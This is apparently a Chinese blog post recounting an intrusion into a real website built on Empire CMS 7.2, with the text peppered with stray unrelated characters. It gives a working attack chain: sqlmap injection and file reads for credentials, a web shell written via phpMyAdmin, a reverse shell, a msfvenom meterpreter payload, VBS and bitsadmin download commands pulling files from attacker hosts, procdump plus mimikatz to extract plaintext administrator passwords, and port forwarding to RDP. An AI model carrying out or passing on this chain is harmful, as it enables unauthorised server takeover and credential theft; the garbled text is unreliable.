一次艱難的網(wǎng)站滲透

信息收集

弱口令登錄失敗。
網(wǎng)站使用帝國cms7.2


image.png

弱口令登錄失敗,使用帝國cms的通用漏洞鲜侥,失敗天揖。
在知道絕對路徑的情況下夺欲,dba權(quán)限的sql注入可以直接執(zhí)行os-shell命令拿shell。
掃描開放端口今膊,反查域名些阅,尋找最可能存在sql注入的網(wǎng)站。


image.png

經(jīng)過多次嘗試斑唬,發(fā)現(xiàn)了一個(gè)聯(lián)合查詢型市埋。且為dba權(quán)限的注入點(diǎn)黎泣。
image.png

sql注入的利用

已知絕對路徑,且注入點(diǎn)為dba權(quán)限缤谎,在平時(shí)的大多數(shù)滲透中抒倚,就已經(jīng)意味著getshell了。
然而坷澡,在這次滲透中托呕,os-shell并沒有執(zhí)行成功。


image.png

經(jīng)過多次嘗試都以失敗告終频敛,猜測某種waf起了作用项郊。
嘗試使用sqlmap的寫文件命令(--file-write 本地文件地址 --file-dest 寫入地址),直接寫入文件到網(wǎng)站目錄下斟赚。


image.png

image.png

沒有找到文件呆抑,多次嘗試sqlmap無法成功寫入文件。
嘗試使用sql-shell執(zhí)行sql語句寫入文件汁展。
image.png

失敗鹊碍,顯示不支持非查詢語句。


image.png

肉到嘴邊吃不到呢食绿,這感覺不好侈咕,sqlmap中所有能getshell的方法,都試的差不多了器紧,依然沒有成功耀销。
這時(shí)突然想起了網(wǎng)站存在phpmyadmin,也許可以通過phpmyadmin拿shell铲汪。
不知道數(shù)據(jù)庫密碼熊尉,需要通過sqlmap的--file-read命令讀取網(wǎng)站的配置文件。一般情況下網(wǎng)站配置文件的位置是沒法確定的掌腰,然而狰住,網(wǎng)站使用了帝國cms,一般配置文件的位置是固定的齿梁。帝國cms7.0后配置文件在e/config/config.php
image.png

成功讀取到網(wǎng)站配置信息催植。
image.png

phpmyadmin的利用

使用獲取到的密碼登錄phpmyadmin


image.png

執(zhí)行sql語句寫入文件。


image.png

執(zhí)行成功勺择。
image.png

訪問生成的文件创南,可以訪問到,使用菜刀連接失敗省核。


image.png

懷疑是木馬沒有免殺稿辙,或者菜刀流量被攔截。
換上免殺馬气忠,使用插件hackbar執(zhí)行一句話邻储,和加密中轉(zhuǎn)shell流量都以失敗告終未桥。
經(jīng)過多次嘗試對比,發(fā)現(xiàn)腳本木馬只能夠本地執(zhí)行芥备,無法遠(yuǎn)程執(zhí)行命令冬耿。
<?php echo `ipconfig`?>

生成一個(gè)本地執(zhí)行ipconfig的腳本文件,并把內(nèi)容輸出出來萌壳。
訪問該文件亦镶,成功訪問到輸出的ip信息。


image.png

image.png

猜測正向連接無法使用袱瓮,只能使用反向連接缤骨,把對方的shell反彈到公網(wǎng)。
把反彈腳本轉(zhuǎn)化為16進(jìn)制尺借。


image.png

開啟nc監(jiān)聽绊起,訪問生成的文件。
image.png

反彈成功燎斩,且為最高權(quán)限虱歪。
image.png

但是進(jìn)程中發(fā)現(xiàn)存在360全家桶。無法添加用戶栅表。只能嘗試讀取當(dāng)前管理員的密碼笋鄙。
且上傳Mimikatz無法做到免殺。

采取另一種方案Procdump+Mimikatz:

Procdump由微軟官方提供:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
分為2步:
1怪瓶、導(dǎo)出lsass.exe進(jìn)程

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2萧落、使用mimikatz破解導(dǎo)出的文件lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

因此現(xiàn)在需要上傳procdump64.exe生成lsass.dmp文件,下載下來在本地讀取密碼洗贰。

在只能輸入dos命令的情況下一般通過2種方法下載文件找岖。

1、創(chuàng)建downfile.vbs下載文件敛滋。

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs
cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp

2许布、使用bitsadmin命令

bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg

首先利用第一種方法下載,上傳vbs文件失敗了矛缨,360全家桶果然可以爹脾。vps被當(dāng)成病毒被殺了帖旨。
使用第二種方法箕昭,也失敗了,不知道是由于什么原因失敗的解阅。
在dos命令無法滿足我的情況下落竹,msf出場了。

msf的利用

由于到目前為止货抄,只能通過數(shù)據(jù)庫進(jìn)行文件的上傳述召。
因此需要用到php的反彈木馬朱转,再加上360全家桶不會去檢查網(wǎng)站文件的安全性,省了免殺處理的環(huán)節(jié)积暖。
php反彈木馬使用php/meterpreter/reverse_tcp模塊

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php
image.png

轉(zhuǎn)化為16進(jìn)制藤为,使用phpmyadmin上傳,開啟監(jiān)聽夺刑,訪問上傳的文件缅疟。


image.png

成功接收到了會話。
使用meterpreter的上傳命令上傳procdump64.exe到網(wǎng)站根目錄
使用procdump64.exe -accepteula -ma lsass.exe lsass.dmp命令導(dǎo)出lsass.dmp文件到根目錄下載下來遍愿。


image.png

使用內(nèi)核相同到虛擬機(jī)運(yùn)行mimikatz存淫,得到管理員明文的賬戶密碼。
image.png

到這一步已經(jīng)得到了管理員到賬戶密碼沼填,下一步需要把遠(yuǎn)程連接服務(wù)轉(zhuǎn)發(fā)出來桅咆。
使用tasklist /svc命令查看TermService的進(jìn)程號。
使用netstat -ano查看進(jìn)程號對應(yīng)的端口為5277
確定5277為修改后遠(yuǎn)程桌面服務(wù)端口坞笙。
在meterpreter中使用端口轉(zhuǎn)發(fā),轉(zhuǎn)發(fā)5277到本地的5555端口岩饼。

portfwd add -l 5555 -p 5277 -r 192.168.100.208

遠(yuǎn)程桌面連接本地的5555端口,輸入得到的賬戶密碼薛夜,登錄成功忌愚。


image.png

證實(shí)了服務(wù)器的防護(hù)很多,vbs文件被殺了却邓!終于滲透成功硕糊,總歸只能說網(wǎng)站的運(yùn)行權(quán)限太高了,如果只是普通用戶腊徙,想要拿下這臺服務(wù)器可真的是太難了简十。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市撬腾,隨后出現(xiàn)的幾起案子螟蝙,更是在濱河造成了極大的恐慌,老刑警劉巖民傻,帶你破解...
    沈念sama閱讀 206,482評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件胰默,死亡現(xiàn)場離奇詭異,居然都是意外死亡漓踢,警方通過查閱死者的電腦和手機(jī)牵署,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,377評論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來喧半,“玉大人奴迅,你說我怎么就攤上這事⊥荩” “怎么了取具?”我有些...
    開封第一講書人閱讀 152,762評論 0 342
  • 文/不壞的土叔 我叫張陵脖隶,是天一觀的道長。 經(jīng)常有香客問我暇检,道長产阱,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,273評論 1 279
  • 正文 為了忘掉前任块仆,我火速辦了婚禮心墅,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘榨乎。我一直安慰自己怎燥,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,289評論 5 373
  • 文/花漫 我一把揭開白布蜜暑。 她就那樣靜靜地躺著铐姚,像睡著了一般。 火紅的嫁衣襯著肌膚如雪肛捍。 梳的紋絲不亂的頭發(fā)上隐绵,一...
    開封第一講書人閱讀 49,046評論 1 285
  • 那天,我揣著相機(jī)與錄音拙毫,去河邊找鬼依许。 笑死,一個(gè)胖子當(dāng)著我的面吹牛缀蹄,可吹牛的內(nèi)容都是我干的峭跳。 我是一名探鬼主播,決...
    沈念sama閱讀 38,351評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼缺前,長吁一口氣:“原來是場噩夢啊……” “哼蛀醉!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起衅码,我...
    開封第一講書人閱讀 36,988評論 0 259
  • 序言:老撾萬榮一對情侶失蹤拯刁,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后逝段,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體垛玻,經(jīng)...
    沈念sama閱讀 43,476評論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,948評論 2 324
  • 正文 我和宋清朗相戀三年奶躯,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了帚桩。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,064評論 1 333
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡巫糙,死狀恐怖朗儒,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情参淹,我是刑警寧澤醉锄,帶...
    沈念sama閱讀 33,712評論 4 323
  • 正文 年R本政府宣布,位于F島的核電站浙值,受9級特大地震影響恳不,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜开呐,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,261評論 3 307
  • 文/蒙蒙 一烟勋、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧筐付,春花似錦卵惦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,264評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至较解,卻和暖如春畜疾,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背印衔。 一陣腳步聲響...
    開封第一講書人閱讀 31,486評論 1 262
  • 我被黑心中介騙來泰國打工啡捶, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人奸焙。 一個(gè)月前我還...
    沈念sama閱讀 45,511評論 2 354
  • 正文 我出身青樓瞎暑,卻偏偏與公主長得像,于是被迫代替她去往敵國和親与帆。 傳聞我的和親對象是個(gè)殘疾皇子金顿,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,802評論 2 345

推薦閱讀更多精彩內(nèi)容